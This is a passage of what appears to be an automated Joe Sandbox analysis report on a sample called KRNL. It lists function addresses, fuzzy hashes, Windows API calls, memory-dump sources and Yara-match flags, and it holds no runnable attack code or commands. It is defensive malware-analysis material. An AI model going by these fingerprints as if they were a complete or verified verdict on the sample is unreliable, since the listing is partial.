                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d951a064ba376ef0ab1e331f3da37d4909f203b053ee85f0241cb0e20adf5693
                                                                                                                                                                                                                                                          • Instruction ID: 483fac9db8fa4d4ce9a32f7b6d2a99bd651ee9dedbbfcbc43d88c98b5340b176
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d951a064ba376ef0ab1e331f3da37d4909f203b053ee85f0241cb0e20adf5693
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A319175918325DFE7108F24E84076BB3E0FF8A704F42992DFA8867251D775AD02DB8A
                                                                                                                                                                                                                                                          Function 004291B1 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 5e25419dcdc4a6fc980d0c6fae64b8a2c5d6b13afd9a4bbe918282eb8fec4a2f
                                                                                                                                                                                                                                                          • Instruction ID: d8e08574f82cd8de6d4a912b3747ff5c6ffa62e7e0667d109b6447ea9b859a78
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e25419dcdc4a6fc980d0c6fae64b8a2c5d6b13afd9a4bbe918282eb8fec4a2f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69112631708131AFE7218B58E840B3B73A6EB56700F86547EE8459B262C735DC51C79E
                                                                                                                                                                                                                                                          Function 00415F4C Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: c8c0b179c961012aaf13dcfc384b3cf47c4208e7f499cb5a1f75f21b03d5c3ad
                                                                                                                                                                                                                                                          • Instruction ID: e01e8ad496858cf7e03153b796b9d7568f72ed25b099349c96fe9f05fa2df913
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8c0b179c961012aaf13dcfc384b3cf47c4208e7f499cb5a1f75f21b03d5c3ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521EE396083009BE324CF28D8807ABB7E6BFCC310F55542EE4C9D3390CA75A882C749
                                                                                                                                                                                                                                                          Function 00429266 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2ec7078835481f123f5f77f44bdbf82c19f6412a785f005351cfc70050280c9f
                                                                                                                                                                                                                                                          • Instruction ID: de574d8ef507392a8877d5164bd103d2c8184940448fadef50134c9f0e47bf87
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ec7078835481f123f5f77f44bdbf82c19f6412a785f005351cfc70050280c9f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC219D32A182309BD724CB64D41033BB3A2BB99B00F43952EEC89A7390C3359C51C7DA
                                                                                                                                                                                                                                                          Function 00415E8C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: f786f9d0427de763eb256307a40778ccb2397783a6807c68432138b4c80bfda7
                                                                                                                                                                                                                                                          • Instruction ID: e9f2c898b879e903da70b9e429ce9134d7ef22d2719c10893a826b5f0a97e484
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f786f9d0427de763eb256307a40778ccb2397783a6807c68432138b4c80bfda7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6118C35A14B108BD728CF14C8803FBB2D7ABC5310F9A143DA9C9A7390DA755C81C34C
                                                                                                                                                                                                                                                          Function 0042D5E6 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 865dbfc94376fd9eda7bada6642632c65b23654f0560e6e8f497fc09db05edbb
                                                                                                                                                                                                                                                          • Instruction ID: ac6ca9c93964504772eca284631e760098c7aed601eafe4151e82a679ad36206
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 865dbfc94376fd9eda7bada6642632c65b23654f0560e6e8f497fc09db05edbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21DA7AA2522047DB6CCF39D8A96BAE292EB81300F59E63DD446E73A0FF7485008745
                                                                                                                                                                                                                                                          Function 00434E60 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction ID: 1294d0705928bf3a89d236d6dca5d2cbcf07529827a8e07e7f8c1353ee7f14bb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F112933A081D04EC312CD3C84005E5BFE31AD7235F5D939AF4B49B2D2D6279D8A8359
                                                                                                                                                                                                                                                          Function 00429F80 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                                          • Instruction ID: 751a0443e18ccd328d4b1c2847a2144c861d21d079d442caefe011fc4f84fbda
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101B5F1B0031257E7609E11B5C0B27B2A86F84718F49453EE84897745EB7DFC05C29A
                                                                                                                                                                                                                                                          Function 0043B8A0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 1078bce38a58236b1dcac59600fd09b41bbb1c8398a618abe0f8d5b15d6c0b66
                                                                                                                                                                                                                                                          • Instruction ID: 8a02cb41ffff968b99fb010e73d9931b32f54ff3ec56746a22d9f2732814edb2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1078bce38a58236b1dcac59600fd09b41bbb1c8398a618abe0f8d5b15d6c0b66
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7911C275008308AFC610AB15D884A7BB7AAFFDE319F05142DE78457330E332AD60DB96
                                                                                                                                                                                                                                                          Function 0040A2A6 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                                                          • Instruction ID: 77776f84d681761c0ea4071f8d21c85d41b3b70496975be68b61ff512d909adb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C110B31A543418FD7388F658410276B7E5AF9271572DC93EC8D3A7345DB3898528F49
                                                                                                                                                                                                                                                          Function 0043CDF0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                                                          • Instruction ID: 04682a1340c881939bba4ac63b5721f1f095575c768f5dd830452c6098d82978
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3101D636D15A604BD319CF38CC1039673E6AB86306F098538DA45E7798DB7A98508784
                                                                                                                                                                                                                                                          Function 0040A533 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                                                          • Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684
                                                                                                                                                                                                                                                          Function 0070AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                                          • Opcode ID: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
                                                                                                                                                                                                                                                          • Instruction ID: 341c42c84f5c250b81d4d878749770d96cfdb581091847031405732ae010ab71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D71E272A00749FBDF219F64CC41FAF77EADF45310F294259E904A72D1EA799C008766
                                                                                                                                                                                                                                                          Function 006EFE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 006EFE70
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EFE9C
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 006EFEDB
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EFEF8
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006EFF37
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EFF54
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006EFF96
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006EFFB9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                                                                                                          • Opcode ID: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
                                                                                                                                                                                                                                                          • Instruction ID: 8a514d65a2c29b63ce07548d9fda97788de5ad821e55bb1fb3a438822cf466fa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6051BE72A0138AAFEF204F66CC45FEB7BAAEF41750F248439F914DA290DB319C108B54
                                                                                                                                                                                                                                                          Function 006FEE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                          • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                          • Instruction ID: 53a2b6661e2d74c74cfcfbc20e3de9288081ca08ff30eea60494de05eccb8fe2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB15672A01259EFDB21CF24CC91BFE7FA6EF55310F144165EA44AB382DA759901C7A0
                                                                                                                                                                                                                                                          Function 0042349F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 149COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423561
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042365E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: afrf$dfkf$s6B$tfff
                                                                                                                                                                                                                                                          • API String ID: 237503144-2388771387
                                                                                                                                                                                                                                                          • Opcode ID: 739c69699291754c9f9d4d5da237538ed2a12a9be9dcb9908bf42b9da2381962
                                                                                                                                                                                                                                                          • Instruction ID: c4fcef847fc9925244f9592ad32bc230489d7192a80fca4986f29a4843e4299b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 739c69699291754c9f9d4d5da237538ed2a12a9be9dcb9908bf42b9da2381962
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA51ACB1D002149FDB14CF9ADC82B9A7AB4FB84310F15816DE904AF399C7798942CBE6
                                                                                                                                                                                                                                                          Function 006F0D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006F0D77
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006F0D7F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006F0E08
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 006F0E33
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006F0E88
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: b118e9bd8ffa822bdca2f7e6d26140d55c01dc1c099cfd4b7faf6a4368585889
                                                                                                                                                                                                                                                          • Instruction ID: 694c281a61097a4ca51bfcc6b9b39304c963aa9d2f759b1aa154b3f46cf189b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b118e9bd8ffa822bdca2f7e6d26140d55c01dc1c099cfd4b7faf6a4368585889
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9341C074A0021C9BDF10DF68C884AFEBBA7AF44314F148959EA149B393DB35AE11CB94
                                                                                                                                                                                                                                                          Function 006E3C70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E3CA5
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E3CBF
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E3CE0
                                                                                                                                                                                                                                                          • __Getctype.LIBCPMT ref: 006E3D92
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E3DD8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
